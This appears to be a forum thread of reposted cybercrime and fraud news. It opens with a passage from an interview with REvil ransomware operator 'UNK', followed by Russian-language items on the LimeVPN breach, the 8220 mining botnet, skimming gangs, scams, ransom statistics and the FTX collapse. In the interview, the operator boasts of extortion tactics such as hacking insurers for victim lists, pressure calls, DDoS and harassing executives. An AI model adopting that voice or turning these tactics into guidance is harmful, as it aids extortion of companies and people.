give good results. As I said, we are creating a new branch of development for
extortion. If you look at the competitors, unfortunately, many people simply
copy our ideas and what is most surprising—the style of the text of our
messages. It’s nice—they try to show that they are as good as us, trying to
reach the level and even striving to surpass in somethings. And in some things
they are already better. For example, with those Linux versions and so on. But
this is temporary. Of course, we are working on all of this as well, but with
one caveat—it will all be much better. Therefore, a little bit slower.
REvil uses its dark web “Happy Blog” to publicize data auctions for
ransomware victims who have not paid demands.
**DS:****Elliptic Curve Cryptography (ECC) was a really good choice [editor’s
note: ECC has a smaller key size than the RSA-based public-key system, which
makes it attractive to affiliates] what else are you proud of, what part of
the code? How do you decide when it’s time for new features in the code?
UNK:** A search by IOCP [Input/output completion port], a back connection borrowed from crabs [carders], a server-side protection system—there are many advantages, it is better to read AV reviews. Personally, I really like the encryption system. It came out almost perfect.
**DS: I have been impressed with the variety of packers and crypters I’ve seen with your malware. Do you sell them to others? I saw one used in a Maze malware sample once. Do you sell them or did one of your employees move to a competitor?
UNK:** Partners often switch affiliate programs and because of this, there is that kind of variety.
**DS: Pavel Sitnikov said that you bought the GandCrab code from Maksim Plakhtiy, is this true?
UNK:** It’s true that we bought it, but the names and so on are unknown to us. Even if it was the Rotten Gene, we don’t care.
**DS: Do you believe that ransomware is a perfect weapon for cyberwar? Are you afraid that one day it could start a real war?
UNK:** Yes, as a weapon it can be very destructive. Well, I know at the very least that several affiliates have access to a ballistic missile launch system, one to a U.S. Navy cruiser, a third to a nuclear power plant, and a fourth to a weapons factory. It is quite feasible to start a war. But it’s not worth it—the consequences are not profitable.
As a weapon [ransomware] can be very destructive… It is quite feasible to start a war. But it’s not worth it—the consequences are not profitable.”
Click to expand...
**DS: What other regions besides the CIS [mainly comprised of post-Soviet republics] do you try to avoid? What organizations never pay?
UNK:** All the CIS, including Georgia and Ukraine. Primarily because of geopolitics. Secondly because of the laws. Thirdly, for some, because of patriotism. Very poor countries don’t pay—India, Pakistan, Afghanistan, and so on.
**DS: You previously mentioned that you and your affiliates understand the risks of going abroad and don’t travel. Do you think there can be a “winds of change” and local law enforcement will start paying attention to your operations?
UNK:** If we get into politics, yes. If we look at the countries in the CIS, yes. For everything else—we remain neutral.
**DS: Do old-school criminals cause any issues?
UNK:** They don’t.
**DS: What’s your usual reaction when you see a ransomware gang or affiliate getting charged or arrested? Netwalker and Egregor reduced their operations since the raids, how do you feel about that?
UNK:** Neutral. This is a normal workflow. Due to the closure of the Maze, we have only increased the number of promising affiliates. So for us, I would say it is positive, in a way.
**DS: What was the highest number of affiliates you had at any one time?
UNK:** 60.
**DS: When they leave, is it because they’re done with ransomware or because they jump ship to another ransomware-as-a-service for better rates? Does it create any issues or problems for you when an affiliate moves to a competitor?
UNK:** There are definitely two sides to this. 30% leave because they have earned enough. But naturally, they always come back sooner or later. Otherwise, yes, they go to competitors who dump the rates (up to 90% and so on). Of course, this is unpleasant, but this is competition. It means that we need to make sure that people return. Give them what others don’t.
DS: Some operators give a percentage of their earnings to charities. What’s your opinion on this? Who would you like to donate a million to?

UNK: Free projects for anonymity.
**DS: How has your interaction with victim organizations changed since the beginning of the pandemic?
UNK:** It’s definitely changed. The crisis is palpable, they are not able to pay the same amounts as before. Except for manufacturers of pharmaceutical products. I think it is worth paying more attention to them. They are doing just fine. We need to help them.
**DS: Do your operators target organizations that have cyber insurance?
UNK:** Yes, this is one of the tastiest morsels. Especially to hack the insurers first—to get their customer base and work in a targeted way from there. And after you go through the list, then hit the insurer themselves.
DS: How do you treat ransomware negotiators? Is it easier to deal with professionals? Do they help or make it more difficult?
this is one of the tastiest morsels. Especially to hack the insurers first—to get their customer base and work in a targeted way from there. And after you go through the list, then hit the insurer themselves.”
Click to expand...
UNK: 70% are just there to knock down the price. Very often they make it harder. Well, for example, the company has a revenue of $1 billion. They are being ransomed for $1 million. The negotiator comes and says, we don’t care, we won’t give more than $15,000. We reduce the price to $900,000. He offers $20,000. Well, then we understand that the conversation with him is meaningless and we start publishing the data so that the owners of the network smack him upside the head for negotiating like that. And of course, after those kinds of tricks, the price tag only goes up. Instead of $1 million, they will pay one-and-a-half. Nobody likes hagglers, especially show-offs. So, more often than not, they are likely to do more harm. They only help purely in buying BTC or Monero. The rest is harmful.
DS: Do you recommend any specific negotiators to the compromised businesses or do they act on their own? Not everyone has 100 BTC on hand to buy out the data and it’s not that easy to get on short notice.
To finish off with DDoS is to kill the company. Literally. I also think we will expand this tactic to persecution of the CEO and/or founder of the company.”
Click to expand...
UNK: We write to decent intermediaries to let them know the target so that they can reach out themselves. We give good discounts to decent intermediaries so that they can make a bit of profit and the companies pay less. And in terms of deadlines—we can always give some extra time. In general, if there is an understanding that you have to pay, no other options, but not as much, we will find a common language. But if we get delusional messages like, “There is no money” or, “We will pay one-tenth,” you have no one to blame but yourself.

References to REvil attacks gathered from private and underground sources.
Courtesy of Recorded Future.
**DS: You said that you like to apply additional pressure through DDoS
[editor’s note: distributed denial-of-service attacks involve flooding a site
with junk traffic, making it unreachable]. How effective is this scheme?
UNK:** We do not use it often, in contrast to calls. Calling gives a very good result. We call each target as well as their partners and journalists—the pressure increases significantly. And after that, if you start publishing files, well, it is absolutely gorgeous. But to finish off with DDoS is to kill the company. Literally. I also think we will expand this tactic to persecution of the CEO and/or founder of the company. Personal OSINT, bullying. I think this will also be a very fun option. But victims need to understand that the more resources we spend before your ransom is paid—all this will be included in the cost of the service. =)
**DS: Tell me a secret.
UNK:** As a child, I scrounged through the trash heaps and smoked cigarette butts. I walked 10 km one way to the school. I wore the same clothes for six months. In my youth, in a communal apartment, I didn’t eat for two or even three days. Now I am a millionaire.
[https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a- millionaire-an-interview-with-revils- unknown/](https://therecord.media/i-scrounged-through-the-trash-heaps-now-im- a-millionaire-an-interview-with-revils-unknown/)
https://www.securitylab.ru/news/543899.php - не, ну всегда можно пойти стиллеры писать, раз уж со шкафчиками неудачно пошло...
Сам шифровальщик написан на языке AutoIt.
Click to expand...
А вы говорите шарпы эти ваши и петухоны...
Мужчина вел нелегальный бизнес по разблокировке смартфонов от сотовых сетей с помощью внутренних систем T-Mobile.
Экс-владельца розничного магазина T-Mobile Аргишти Худавердяна приговорили к 10 годам тюремного заключения за схему разблокировки мобильных телефонов путём взлома внутренних систем T-Mobile. В общей сложности незаконные операции принесли мужчине более 25 млн долларов.
В период с августа 2014 года по июнь 2019 года 44-летний мужчина разблокировал сотни тысяч мобильных телефонов для своих "клиентов". При этом, в июне 2017 г. T-Mobile, заподозрив неладное, аннулировал контракт с предприимчивым американцем – оператор обратил внимание на подозрительную активность компьютера Худавердяна в сети компании.
Как сообщает следствие, вместе со своим бывшим деловым партнером и совладельцем магазина сотовой связи Аленом Гарехбаглу, Худавердян получил доступ к внутренним компьютерным системам T-Mobile, используя учетные данные, украденные в ходе фишинговых атак у более чем 50 различных сотрудников оператора.
Украденные данные использовались для доступа к внутренним компьютерным системам оператора и, во многих случаях, для сброса пароля, который блокировал доступ владельцев учётных записей в систему.
По данным минюста США, используя украденные данные и IMEI-номера, Худавердян вместе с напарником разблокировали сотни тысяч смартфонов на мобильных операционных системах Android и iOS.
Мошенники рекламировали «услуги прямой разблокировки премиум-класса для всех операторов мобильной связи» различными путями, включая рассылки и сообщения на сайтах, таких как unlocks247.com, swiftunlocked.com, unlockitall.com, tryunlock.com и unlockedlocked.com.
Как поясняется в пресс-релизе Минюста, «разблокировка позволила продавать смартфоны на чёрном рынке». Кроме того, клиенты T-Mobile смогли прекратить пользоваться услугами оператора и тем самым лишить его доходов.
T-Mobile продаёт телефоны на условиях сервисных контрактов. Это значит, что смартфоны привязаны к оператору, и клиенты не могут использовать купленные устройства для связи иных провайдеров.
Худавердян признал вину. Помимо тюремного заключения, он должен выплатить 28 млн долларов в качестве компенсации.
Ален Гарехбаглу также признал себя виновным. Приговор ему должны огласить 23 февраля 2023 года.
блокировать после 1 сентября 2024 года
МОСКВА, 19 сентября. /ТАСС/. Правительство РФ признало использование виртуальных мобильных номеров (DEF-номеров) угрозой безопасности в сфере связи и интернета, сервисы по их выдаче после 1 сентября 2024 года планируется блокировать. Соответствующее постановление кабмина, имеющееся в распоряжении ТАСС, вносит изменения в Правила централизованного управления сетью связи общего пользования.
Документ вступит в силу с 1 сентября 2024 года. Согласно постановлению, перечень угроз в этой сфере теперь дополнен пунктом о предоставлении доступа к онлайн-ресурсам и мессенджерам пользователям без их идентификации.
В настоящее время для регистрации в соцсетях и мессенджерах, в том числе в Telegram, пользователь должен предоставить номер мобильного телефона, который при необходимости позволяет идентифицировать его владельца. При этом злоумышленники зачастую используют при регистрации не реальные, а виртуальные DEF-номера, которые принадлежат иностранным операторам связи, сдаются в аренду и никак не привязаны к персональным данным конкретного человека.
Временный номер позволяет создать временный же аккаунт, с помощью которого злоумышленник может размещать противоправную информацию и совершать мошеннические действия.
Источник: https://tass.ru/ekonomika/18780951
VPN-провайдер LimeVPN подтвердил факт утечки данных более 69 тыс. пользователей. В настоящее время официальный сайт компании выведен в офлайн, а специалисты занимаются расследованием этого киберинцидента.
Стоящие за взломом LimeVPN злоумышленники утверждают, что им удалось выкрасть всю клиентскую базу данных, а уже после этого «положить» веб-ресурс провайдера.
Среди скомпрометированных сведений есть полные имена пользователей, пароли в виде простого текста (!), IP-адреса и платёжная информация. Исследователи из компании PrivacySharks также уточнили, что в руки преступников попали открытые и закрытые ключи пользователей LimeVPN.
«Хакеры сами обратились к нам, утверждая, что в их распоряжении находятся закрытые ключи всех пользователей. На самом деле, это очень серьёзно, поскольку с помощью этих ключей злоумышленники смогут расшифровать любой трафик LimeVPN», — [пишут специалисты](https://www.privacysharks.com/well- known-vpn-provider-in-security-breach-sensitive-information-hacked-and-sold- on-dark-web/).
Другими словами, для взломавших VPN-провайдера киберпреступников открывается отличная возможность — собрать как можно больше ценной информации. Это легко осуществить, «просушивая» уже расшифрованный с помощью ключей трафик.
Более того, базу украденных данных уже разместили на одном из хакерских форумов — RaidForums. Некий участник форума, скрывающийся за псевдонимом «slashx», заявил, что БД насчитывает 10 тысяч записей. За всю эту информацию преступник хочет 400 долларов.
Предполагаемая мощность системы – 200 000 изображений в сутки.
Роскомнадзор (РКН) запустил систему "Окулус", основанную на искусственном интеллекте, которая может обнаруживать запрещенный контент на фотографиях или видео, такой как экстремизм, пропаганда ЛГБТ или порнография. Об этом сообщил представитель Главного радиочастотного центра, подчиненного РКН, который являлся заказчиком проекта.
По словам представителя ГРЧЦ «Информационная система «Окулус» уже запущена и выполняет возложенные на нее задачи в полном объеме: выявляет нарушения законодательства в изображениях и видеоматериалах».
Согласно его словам, в декабре 2022 года система была протестирована, а в январе 2023 года прошла интеграция с другими инструментами мониторинга Роскомнадзора.
Также он уточнил, что до 2025 года в «Окулус» планируют добавить возможность определять новые типы нарушений, а также «функции определения поз людей и их действий». "Окулус" автоматически выявляет нарушения, такие как экстремизм, призывы к незаконным мероприятиям, суицид, контент, связанный с наркотиками, и пропаганду ЛГБТ, - добавил представитель центра, и отметил, что ранее сотрудники ГРЧЦ должны были самостоятельно обрабатывать более 200 изображений и видео в день.
Система будет выявлять запрещённые материалы «на нескольких кадрах на видеофрагментах, в сложных рукописных текстах и рисованном контенте», – cообщили в надзорном ведомстве
В августе прошлого года стало известно, что роскомнадзор выделил 57,7 млн рублей на разработку системы поиска противоправного контента «Окулус». Система будет анализировать фото, видео и тексты на сайтах, в социальных сетях и мессенджерах на предмет запрещенной информации с помощью нейросетей.
source: vedomosti.ru/technology/articles/2023/02/13/962682-roskomnadzor- zapustil-sistemu-poiska-okulus
Специалисты SentinelOne [обнаружили](https://www.sentinelone.com/blog/from- the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected- hosts/) майнинговый ботнет, который насчитывает около 30 000 зараженных хостов по всему миру. Исследователи говорят, что ботнет принадлежит группировке 8220, активной с 2017 года.
Эксперты пишут, что группа 8220 —это «одна из многих низкоквалифицированных преступных групп», за которыми они наблюдают постоянно. Как правило, эти хакеры заражают облачные хосты с помощью известных уязвимостей, а также векторов заражения, связанных с удаленным доступом.
Интересно, что еще в конце 2021 года этот ботнет насчитывал лишь около 2000 хостов. Столь быстрый рост специалисты объясняют активными атаками на Linux- серверы, о которых недавно предупреждали аналитики Microsoft, а также эксплуатацией багов в облачных приложениях и взломом защищенных установок Docker, Apache WebLogic и Redis.
Напомню, что, по данным Microsoft, новейшая кампания хакеров направлена против Linux-систем (i686 и x86_64), и в ее рамках применяются эксплоиты для удаленного выполнения кода. В частности, хакеры используют для получения первоначального доступа недавно раскрытый баг в Atlassian Confluence (CVE-2022-26134), а также старую уязвимость в Oracle WebLogic (CVE-2019-2725).
Помимо кастомного майнера PwnRig, основанного на известном XMRig, который используют преступники, атакующий скрипт группы также предназначен для удаления защитных инструментов и брутфорса SSH (с использованием списка из 450 жестко закодированных учетных данных) для дальнейшего бокового перемещения по сети.
Более того, новые версии скрипта имеют черные списки, которые помогают малвари избегать компрометации определенных хостов, включая серверы-приманки исследователей.
Также отмечается, что сам PwnRig тоже недавно был обновлен и теперь использует домен, подделывающийся под ФБР, а IP-адрес указывает на законный домен федерального правительства Бразилии. Все это сделано ради сокрытия мошеннических запросов к майнинговому пулу, чтобы было неясно, куда уходят «заработанные» хакерами деньги.
Кибератаки на жизненно важные сферы экономики США спровоцировали Госдеп принимать меры.
Госдепартамент США объявил вознаграждение за информацию о местонахождении 6 иранских хакеров, ответственных за серию кибератак на критическую инфраструктуру США в 2023 году.
По данным Госдепа, фигуранты – сотрудники иранских служб безопасности, связанные с деятельностью хакерских групп Корпуса стражей исламской революции (КСИР), в частности, с группировкой CyberAv3ngers. Один из киберпреступников, Махди Лашгариан, предположительно возглавляет КСИР и является командиром сил « Кудс ». Другие 5 человек занимают высокие должности в КСИР.
Группа хакеров CyberAv3ngers, связанная с КСИР и лично с Махди Лашгарианом, атаковала программируемые логические контроллеры (ПЛК) израильской компании Unitronics, используемые в водоочистных сооружениях, энергетике, пищевой промышленности, здравоохранении и других отраслях.
В феврале 2024 года Министерство финансов США объявило о введении санкций против 6 чиновников КСИР. Санкции предусматривают блокировку всех активов и имущества лиц на территории США или в распоряжении американских граждан. Любые сделки с участием активов или имущества подсанкционных лиц в США также запрещены.
В январе Recorded Future представила доказательства причастности иранских
военно-разведывательных структур к кибератакам против западных стран. Отчёт
выявил тесные связи между несколькими организациями, связанными с КСИР и
компаниями-подрядчиков, занимающимися кибератаками.
rewardsforjustice.net/rewards/cyberav3ngers
В среду суд в Бухаресте выдал ордер на арест Флориана Тудора – предполагаемого главаря преступной группировки, известной как «Ривьера Майя». Ее члены похитили более миллиарда долларов через скимминг банковских карт. Мишенями становились в основном туристы в Мексике, с чьих счетов затем снимали деньги.
Суд предписал задержать Тудора на 30 дней до суда.
Тудор сейчас живет в Мексике, где власти месяц назад заморозили несколько банковских счетов, принадлежащих, как сообщалось, самому Тудору и другим членам «Ривьеры Майя».
В прошлом году румынское Управление по борьбе с мафией официально обвинило Тудора в организации преступного сообщества, а также в вымогательстве и подстрекательству к убийству в составе подконтрольной ему криминальной группы. «Ривьера Майя» базируется в Мексике и состоит в основном из граждан Румынии.
В минувшую пятницу в Румынии шестерых членов «Ривьеры Майя» приговорили к тюремным срокам от трех до десяти лет — суд в Бухаресте признал их виновными в покушении на убийство, создании преступного сообщества, незаконном владении оружием и вождении без прав.
Прокуратура инициировала судебное разбирательство в январе прошлого года. По оценкам правоохранителей, в группировке почти тысяча человек.
В 2020 году OCCRP вместе с объединениями Quinto Elemento Lab и Mexicanos contra la Corrupción y la Impunidad выпустил расследование о незаконном промысле «Ривьеры Майя».
Своим «оперативным центром» группировка сделала мексиканский Канкун. С помощью специальных устройств в банкоматах в разных частях Мексики злоумышленники копировали данные кредиток и по дубликатам крали деньги со счетов. Через подконтрольные им компании они затем вкладывали деньги в недвижимость в Мексике и Румынии.
Также в прошлом году против Тудора и еще трех членов группировки выдвинули обвинение в покушении на убийство их подельника Соринела Марку, который был правой рукой Тудора: в ходе конфликта на почве денег и ревности Марку получил множество ножевых ранений.
В прошлом году в электронной переписке с OCCRP Тудор отмел обвинения в свой адрес, утверждая, что он законопослушный бизнесмен. «Я никогда никого не убивал и не отдавал приказа убивать», — написал Тудор.
Мошенники придумали очередной способ, чтобы грабить доверчивых пенсионеров. Он довольно жестокий, и жертвами аферистов стали уже несколько пожилых людей в Петербурге.
Накануне вечером к полицейским Выборгского и Московского районов города обратились родственники двух пенсионерок. Они рассказали, что пожилым женщинам позвонили какие-то люди и, представившись главными врачами местных поликлиник, сообщили об их тяжёлых болезнях, которые надо немедленно лечить. Свои слова они обосновывали информацией, полученной вследствие изучения медицинских карт «пациенток» и необходимостью срочно принять меры – иначе всё может кончиться крайне плохо.
Разумеется, нужных лекарств в продаже нет (и не будет), однако спасительные таблетки припасены у самих врачей, и они с радостью поделятся ими.
Далее к бабушкам явился курьер и принёс упаковку, за которую одна напуганная женщина отдала 250 тысяч рублей, другая – 860. За это им вручили пластиковые контейнеры с препаратами, которые, как выяснилось позже, были обычными витаминами.
По данным фактам возбуждено уголовное дело, злоумышленников ищет полиция.
Кроме того, медианная сумма выкупа снизилась на 51% процент.
Компания Coveware опубликовала отчет со статистикой по атакам с использованием вымогательского ПО за второй квартал 2022 года. В отчете видно, что во втором квартале 2022 года средняя сумма выкупа составила $228 125 (на 8% больше, чем в первом квартале 2022 года). Однако медианная сумма выкупа составила $36 360, что на 51% меньше, чем в предыдущем квартале.
Средняя стоимость выкупа за последние кварталы
И тенденция на снижение стоимости выкупа идет с 4 квартала 2021 года, когда был зафиксирован пик средних ($332 168), так и медианных ($117 116) выплат. Специалисты Coveware считают, что такая тенденция показывает смещение разработчиков вымогательского ПО и их партнеров в сторону более мелких организаций, где меньше риски и выше шанс получить выкуп, так как крупные компании все чаще отказываются платить злоумышленникам.

Средний размер компаний, ставших жертвами атак вымогателей
Анализируя наиболее активные группировки вымогателей, Coveware собрала подробную статистику:
Во втором квартале 2022 года самыми активными группировками стали BlackCat и LockBit
Аналитики компании заметили еще одну тенденцию – появление множества небольших группировок, предлагающих вымогательское ПО как услугу. Они собирают хакеров из крупных распавшихся банд и совершают низкоуровневые атаки.
Кроме этого, самой популярной тактикой у злоумышленников стал метод двойного вымогательства – он использовался в 86% зарегистрированных атак. Также стоит отметить, что злоумышленники все реже стали шифровать данные, предпочитая просто похищать их.
source: coveware.com/blog/2022/7/27/fewer-ransomware-victims-pay-as-medium- ransom-falls-in-q2-2022
Во Вьетнаме судят предпринимательницу, которая построила крупнейшую финансовую пирамиду в истории Юго-Восточной Азии. Под прикрытием империи недвижимости она завладела одним из банков страны, мухлевала с облигациями, кредитами и акциями. Вместе с ней судят еще 85 человек. Все, кроме нее, признали вину. Сама женщина продолжает утверждать, что невиновна, но прокуратура требует ее казнить.

Во Вьетнаме прокуратура запросила смертный приговор для 68-летней предпринимательницы Чыонг Ми Лан, которую обвиняют в организации крупнейшего финансового мошенничества в истории Юго-Восточной Азии, передает вьетнамская газета VnExpress.
Обвинение потребовало назначить ей 19-20 лет за взяточничество, столько же за нарушение банковских правил и смертную казнь за растрату. Рекомендуемый «комбинированный приговор» — смертная казнь.
«Лан не признала себя виновной и не проявила раскаяния. Последствия чрезвычайно серьезны и непоправимы, поэтому необходимо строго наказать Чыонг Май Лан и навсегда исключить ее из общества», — заявила прокуратура.
Click to expand...
Судебный процесс над Лан, как ожидается, продлится до конца апреля.
По версии обвинения, махинации Лан причинили ущерб в размере $20 млрд — это около 4,9% валового внутреннего продукта Вьетнама. Прокуроры указали, что предпринимательница нарушала закон неоднократно, «изощренными методами». На суде она вела себя неискренне, делала уклончивые заявления и обвиняла подчиненных.
По делу проходят еще 85 человек. Для нескольких высокопоставленных фигурантов обвинение требует пожизненного заключения. Все обвиняемые, кроме Лан, признали вину. При этом они утверждают, что выполняли ее приказы только потому, что полностью доверяли ей.
В числе подсудимых — родственники бизнесвумен: племянница Труонг Хуэ Ван, муж Эрик Чу. Последний обвиняется в том, что помог ей украсть из банка 9,12 трлн донгов (местная валюта, около $380 млн). Сам он из Гонконга и говорит, что из- за языкового барьера не знал, какие документы подписывал, делая это только по просьбе жены. Племянница призналась, что помогла Лан украсть 1,1 трлн донгов «из-за семейной лояльности».
Лан арестовали в октябре 2022 года в рамках кампании по борьбе со взяточничеством. Лидер правящей коммунистической партии Вьетнама Нгуен Фу Чонг много лет обещал искоренить коррупцию, но до сих пор заметного результата не было, отмечает Reuters.
Как Лан обманывала всю страну.
Женщина создала и возглавила девелоперскую компанию Van Thinh Phat Group
(VTP). Это была одна из самых богатых фирм по недвижимости Вьетнама, которая
возводила роскошные жилые здания, офисы, отели и торговые центры. Но, как
выяснило следственное управление министерства общественной безопасности
Вьетнама, в реальности предпринимательница организовала огромную финансовую
пирамиду.
Для этого Лан построила целую экосистему из тысячи подставных юрлиц, включая компании за границей, и подчинила себе Saigon Commercial Bank (SCB). Она держала 91,5% акций банка, хотя напрямую ей принадлежало только 5%, а остальное было оформлено на 27 юридических и физических лиц. Чтобы контролировать SCB, Лан назначала на ключевые должности близких людей и поощряла их большими зарплатами и бонусами.
Все это было нужно Лан, чтобы брать кредиты у своего же банка, выпускать через него облигации, проворачивать махинации с акциями, присваивать деньги инвесторов.
Так продолжалось много лет. С 2012 по 2022 год группа Лан получила более 2,5 тыс. кредитов в SCB на общую сумму более $44 млрд. Это 93% от общего объема кредитов, выданных банком. Чтобы скрыть махинации, в ход шли взятки чиновникам. Среди прочих взятку в $45,2 млн получил бывший главный инспектор Государственного банка Вьетнама (SBV) До Тхи Нхану. Его тоже судят, прокуратура запросила пожизненное.
Кроме инспектора по делу проходят бывшие руководители SCB. Им также грозит пожизненное заключение за растрату и нарушение банковских правил. Саму Лан помимо прочего обвиняют в причинении банку убытков в размере 498 трлн донгов после вычета стоимости залога. Она согласилась отдать свои семейные активы для компенсации убытков, но потребовала, чтобы их оценили заново.
Лан отрицает все обвинения и говорит, что все кредиты SCB утверждало его руководство, а она не знала об этом процессе. Кроме того, предпринимательница якобы не создавала подставные компании, никого не подкупала и не выводила деньги из банка.
«У меня было много активов и денег в банке. Зачем мне воровать свои собственные деньги?», — сообщила она.
Click to expand...
После ареста Лан вкладчики бросились в SCB, чтобы забрать свои деньги. Это привело к тому, что кредитора поместили под «специальный контроль» Государственного банка Вьетнама. SCB заявил, что все счета, связанные с Van Thinh Phat и его дочерними компаниями, были заморожены полицией, поэтому держатели облигаций не получили свои платежи. Число пострадавших оценивается более чем в 40 тыс. человек. Они все еще надеются вернуть деньги.
«Я могу умереть, прежде чем смогу вернуть свои деньги, но я верю в справедливость и справедливость закона», — заявил один из пострадавших, 87-летний мужчина. Он признается, что потерял $2,2 млн.
Click to expand...
8 ноября 2022 войдет в историю крипты — давно крипторынок так не штормило! Обвал нативного токена крупнейшей биржи FTX на 90% и ниже повлёк за собой падение курсов остальных криптовалют — от старичков биткоина и эфира до мелких альткоинов.
Все начиналось красиво
Шок криптосообщества объясним: у FTX никогда не было имиджа сомнительной и нестабильной биржи. Она привлекала криптоинвесторов выгодными продуктами: многие клюнули на выгоду ее депозитных продуктов — в биткоинах (процентная ставка 5%) и в долларах США (ставка 8%). Пользователи ходили по банкам за кредитами, чтобы добиться прекрасного депозита FTX. Все они в итоге столкнулись с серьезными убытками. Неожиданно!
Репутация криптобиржи среди пользователей была чрезвычайно высока, её учредитель Сэм Бэнкман-Фрид (SBF) претендовал на голос всего крипто-комьюнити, посещая кабинеты вашингтонской правительственной элиты, и был уважаем финансовыми регуляторами США.
Начало конца
2 ноября в сетевом издании о крипте CoinDesk был опубликован материал с информацией, моментально подхваченной всеми крипто-СМИ. Это было журналистское расследование о финансовых связях FTX и хедж-фонда Alameda Research, принадлежащего SBF. Изучив внутреннюю документацию Аламеды, журналисты увидели её интересный баланс, буквально набитый токенами FTT — нативной валютой FTX. Практически весь чистый капитал Аламеды — $14,6 млрд — состоял из этих токенов. То есть, схема такова: SBF создаёт свой токен, поднимает его стоимость чрезвычайно высоко и набирает под него кредиты на Аламеду. Когда курс токена падает, возникает кризис ликвидности. И образуется более чем 8-миллиардная дыра в бюджете.
Руководитель Binance Чанпэн Чжао вслух выразил намерение избавиться от токенов FTT. Чтобы не вводить крипто-комьюнити в шок, он оговорил, что намерен продать токены лишь частично, но это не помогло FTX и не погасило начавшуюся панику.
Ни одному криптану не нужно объяснять, что значит голос CZ в криптомире. Клиенты FTX буквально полетели выводить свои активы с биржи — раз уж сам CZ считает, что FTT — это рискованное вложение.
Ещё сильнее ситуацию накалил факт, что в тот самый день всеобщего крипто- падения, 8 ноября, CZ выражал желание спасти FTX — приобрести её. Обнадёженный SBF даже оставил на своей странице запись о том, что «клиенты защищены».
Но буквально суток CZ хватило, чтобы изменить своё решение (он явно потратил их на изучение бухгалтерской отчётности биржи и оценку рисков). 9 ноября он сообщил, что отменяет сделку. С ним вариант «дай вам Боже, что нам негоже» не пройдёт: FTX слишком проблемная инвестиция. И ситуация с ней однозначно вышла из-под любого разумного контроля. CZ выразил сожаление, что крах FTX серьезно подрывает доверие к индустрии и привлечёт повышенное внимание регуляторов к ней. И оказался прав.
Финал: где деньги, SBF?
Ранее SBF пользовался весьма лояльным отношением финансовых регуляторов США, но не обратить внимания на эту ситуацию они просто не могли. И Министерство юстиции тоже не прошло мимо, увидев тут мошенническую схему: SBF спасал одну свою компанию за счёт средств пользователей другой.
9 ноября SBF горестно признался Forbes USA, что он, несчастный, теперь не миллиардер.
11 ноября он от имени биржи подал на банкротство по 11-й главе ФЗ США и оставил руководство биржей, передав его Джону Джею Рэю III (по иронии судьбы, этого господина в своё время наняла компания Enron, когда банкротилась с большим скандалом). Вместе с FTX одним махом отправились банкротиться и Аламеда, и ещё 130 филиалов, так или иначе связанных с FTX.
Вопросы, куда пропало примерно $10 млрд клиентских вложений, а также кто и когда вернёт клиентам их средства, повис в воздухе. И предполагается, что так и будет висеть. Никто? Никогда?
NYT: «А что случилось?», или SBF и его высокие покровители
Илон Маск исчерпывающе — единственной фразой — объяснил на своей странице, почему ранее-то регуляторы не замечали действий FTX и ничего не предпринимали: «SBF was a major Dem donor, so no investigation.» (« SBF был основным спонсором демократов, какое тут расследование.»).
14 ноября в New York Times появилось интервью с SBF, вызвавшее у крипто- комьюнити недоумение. SBF, отвечая на вопросы репортёра, признал, что утратил контроль над ситуацией с FTX и не отследил её проблемы из-за расширения деятельности — слишком много приобреталось и финансировалось других проектов. Все это и так понятно, но что же с клиентскими средствами? Деликатное молчание!
Вездесущий Илон отреагировал на интервью мгновенно и резко: «Why the puff piece @nytimes?» («Зачем эта заказуха, «Нью-Йорк Таймс»?). Не молчали и другие значимые криптаны и сопричастные. Остин Оллрэд, возглавляющий Bloom Institute of Technology, саркастически заметил, что о массовых увольнениях с биржи Coinbase NYT писала куда более жестко. А пролюбивший $10 млрд клиентских средств SBF удостоился прямо-таки деликатного интервью. Зуко Уилкокс, разработавший анонимную криптовалюту ZEC, высказал точку зрения, что влиятельное СМИ обеляет SBF с целью спасти его от судебного разбирательства — отсрочить его или вообще избежать суда. Зуко в открытую назвал действия SBF мошенничеством и воровством, разрушившим жизни огромного количества людей.
Джесси Пауэлл, руководитель биржи Kraken, поставил в вину американским СМИ сам факт, что их информационная поддержка способствовала росту доверия пользователей к FTX: СМИ легитимизировали финансовую пирамиду и должны взять на себя ответственность за это. Вместо этого они делают вид, что ничего особенного не произошло.
Сядет ли SBF?
Вот что пишет издание Fortune после беседы с юристами: «Шок от внезапного краха FTX превращается в гнев — становится ясно, что Сэм Бэнкман-Фрид использовал средства клиентов биржи, чтобы покрыть убытки в своей разваливающейся криптоимперии. Теперь вопрос в том, каковы будут последствия для одноразовой иконы, известной всем как SBF.
Будут гражданские иски — клиенты и инвесторы пытаются вернуть то, что осталось от активов FTX, Министерство юстиции, как сообщается, также проводит расследование, поднимая вопросы об уголовных обвинениях и о том, увидит ли SBF тюремную камеру изнутри. Даже если на первый взгляд факты могут показаться обличающими, адвокаты, с которыми связалась Fortune, указали на два потенциальных препятствия для любого уголовного осуждения — хотя прокуроры, вероятно, могли бы преодолеть их».
Первый — это фактор юрисдикции. Поскольку FTX является оффшорным предприятием со штаб-квартирой на Багамах и не обслуживает американцев, адвокаты защиты могут утверждать, что действия его руководителей находятся вне досягаемости правоохранительных органов США. Минюст США, впрочем, хорошо умеет находить нюансы, связывающие зарубежных обвиняемых с американскими берегами, по словам Рэндалла Элиасона, бывшего прокурора, который сейчас преподает юриспруденцию в Университете Джорджа Вашингтона.
Два других юриста, беседовавших с Fortune, поддержали эту точку зрения, заявив, что прокурорам, вероятно, будет легко найти связь в деле FTX — в виде связи между FTX и банками США, электронных писем, встреч в Штатах или других взаимодействий.
Второе потенциальное препятствие для уголовного преследования — это наличие или отсутствие преступного умысла. Любое обвинительное заключение будет зависеть от того, был ли SBF просто некомпетентным в своей работе — или обманывал инвесторов намеренно. «Неправильное управление своей компанией и потеря кучи денег других людей сами по себе не являются преступлением».
Однако, опытный и давно занимающийся практикой крипто-юрист сообщил Fortune: у него нет сомнений в том, что поведение SBF и деловая практика FTX явно продемонстрировали мошенничество. Адвокат, говоривший на условиях анонимности, указал на такие доказательства, как условия предоставления услуг FTX, различные презентации компании для потенциальных инвесторов и публичные высказывания SBF.
Крипто-юрист добавил, что у прокуроров Министерства юстиции есть все основания возбудить дело по Федеральному уголовному закону под названием Раздел 1343, охватывающему мошенничество с использованием цифровых средств (термин, описывающий различные виды мошенничества, совершённые с помощью электронных инструментов). Закон предусматривает максимальное наказание в виде 20 лет тюремного заключения.
Кого «накрыло взрывной волной»
